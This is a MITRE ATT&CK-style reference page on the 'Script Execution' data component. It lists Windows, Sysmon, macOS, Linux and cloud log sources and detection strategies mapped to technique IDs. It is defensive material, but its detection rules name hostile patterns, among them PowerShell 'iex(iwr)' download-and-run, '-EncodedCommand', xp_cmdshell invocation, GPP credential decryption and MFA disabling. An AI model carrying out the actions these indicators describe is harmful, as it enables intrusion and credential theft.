1. Home
  2. Data Components
  3. Script Execution

Script Execution

The execution of a text file that contains code via the interpreter.

Data Collection Measures:

  • Windows Event Logs:
    • Event ID 4104 (PowerShell Script Block Logging) – Captures full command-line execution of PowerShell scripts.
    • Event ID 4688 (Process Creation) – Detects script execution by tracking process launches (powershell.exe, wscript.exe, cscript.exe).
    • Event ID 5861 (Script Execution) – Captures script execution via Windows Defender AMSI logging.
  • Sysmon (Windows):
    • Event ID 1 (Process Creation) – Monitors script execution initiated by scripting engines.
    • Event ID 11 (File Creation) – Detects new script files written to disk before execution.
  • Endpoint Detection and Response (EDR) Tools:
    • Track script execution behavior, detect obfuscated commands, and prevent malicious scripts.
  • PowerShell Logging:
    • Enable Module Logging: Logs all loaded modules and cmdlets.
    • Enable Script Block Logging: Captures complete PowerShell script execution history.
  • SIEM Detection Rules:
    • Detect script execution with obfuscated, encoded, or remote URLs.
    • Alert on script executions using -EncodedCommand or iex(iwr).
ID: DC0029
Domains: ICS, Enterprise
Version: 2.0
Created: 20 October 2021
Last Modified: 21 October 2025

Log Sources

Name Channel
ApplicationLogs:SQL Stored procedure creation or modification with shell invocation (e.g., system(), exec())
auditd:PROCTITLE scripting loop invoking sleep/ping
azure:activity Microsoft.Compute/virtualMachines/runCommand/action: Abnormal initiation of Azure RunCommand jobs or PowerShell/Bash payloads
EDR:AMSI Malicious inline C#/script blobs embedded in MSBuild projects if intercepted by AMSI-aware loaders (rare but possible via chained LOLBins)
EDR:scriptblock Process Tree + Script Block Logging
esxi:shell None
esxi:vmkernel boot
etw:Microsoft-Antimalware-Scan-Interface Amsi/Script content + API verdicts during in-memory staging
linux:syslog /var/log/syslog
linux:syslog boot logs
m365:defender ScriptBlockLogging + AMSI
m365:office VBA auto_open, auto_close, or document_open events
m365:unified Scripted Activity
macos:osquery exec: Unexpected execution of osascript or AppleScript targeting sensitive apps
macos:syslog system.log, asl.log
macos:unifiedlog log stream --predicate 'eventMessage contains "python"'
macos:unifiedlog log stream --predicate 'eventMessage contains "wscript" OR "vbs"'
macos:unifiedlog osascript or AppleScript invocation modifying UI
macos:unifiedlog log
macos:unifiedlog AppleScript creating login item via 'System Events' dictionary
macos:unifiedlog subsystem=launchservices
macos:unifiedlog log stream with predicate 'eventMessage CONTAINS "osascript"'
macos:unifiedlog subsystem=com.apple.Security or com.apple.applescript
macos:unifiedlog osascript, AppleScript, or Python execution triggered immediately after HID connection
networkdevice:runtime runtime
Script None
WinEventLog:Application Stored procedure creation, modification, or xp_cmdshell invocation via SQL logs or SQL Server auditing
WinEventLog:PowerShell EventCode=4103, 4104
WinEventLog:PowerShell Set-ADUser or Set-ADAuthenticationPolicy with MFA attributes disabled
WinEventLog:PowerShell Scripts with references to XML parsing, AES decryption, or gpprefdecrypt logic
WinEventLog:System EventCode=1502, 1503
WinEventLog:System EventCode=4016,5312

Detection Strategy

ID Name Technique Detected
DET0186 Automated File and API Collection Detection Across Platforms T1119
DET0124 Behavior-chain detection for T1132.001 Data Encoding: Standard Encoding (Base64/Hex/MIME) across Windows, Linux, macOS, ESXi T1132.001
DET0326 Behavior-chain detection for T1132.002 Data Encoding: Non-Standard Encoding across Windows, Linux, macOS, ESXi T1132.002
DET0556 Behavior-chain detection strategy for T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild (Windows) T1127.001
DET0010 Behavioral Detection of Event Triggered Execution Across Platforms T1546
DET0357 Behavioral Detection of Internet Connection Discovery T1016.001
DET0521 Behavioral Detection of Spoofed GUI Credential Prompts T1056.002
DET0384 Behavioral Detection of Unix Shell Execution T1059.004
DET0076 Behavioral Detection of Visual Basic Execution (VBS/VBA/VBScript) T1059.005
DET0202 Behavioral Detection of Windows Command Shell Execution T1059.003
DET0112 Boot or Logon Initialization Scripts Detection Strategy T1037
DET0063 Cross-Platform Behavioral Detection of Python Execution T1059.006
DET0264 Cross-Platform Detection of JavaScript Execution Abuse T1059.007
DET0493 Detect Abuse of Inter-Process Communication (T1559) T1559
DET0381 Detect Access and Decryption of Group Policy Preference (GPP) Credentials in SYSVOL T1552.006
DET0072 Detect Logon Script Modifications and Execution T1037.001
DET0190 Detect MFA Modification or Disabling Across Platforms T1556.006
DET0367 Detect Network Logon Script Abuse via Multi-Event Correlation on Windows T1037.003
DET0734 Detection of Automated Collection T0802
DET0749 Detection of Data from Local System T0893
DET0770 Detection of Network Connection Enumeration T0840
DET0735 Detection of Scripting T0853
DET0793 Detection of System Binary Proxy Execution T0894
DET0237 Detection Strategy for Boot or Logon Initialization Scripts: RC Scripts T1037.004
DET0545 Detection Strategy for Cloud Administration Command T1651
DET0568 Detection Strategy for Input Injection T1674
DET0101 Detection Strategy for Lua Scripting Abuse T1059.011
DET0300 Detection Strategy for Reflective Code Loading T1620
DET0181 Detection Strategy for SQL Stored Procedures Abuse via T1505.001 T1505.001
DET0121 Detection Strategy for T1547.015 – Login Items on macOS T1547.015
DET0587 Enumeration of User or Account Information Across Platforms T1087
DET0082 Internal Website and System Content Defacement via UI or Messaging Modifications T1491.001
DET0372 Multi-Platform Detection Strategy for T1678 - Delay Execution T1678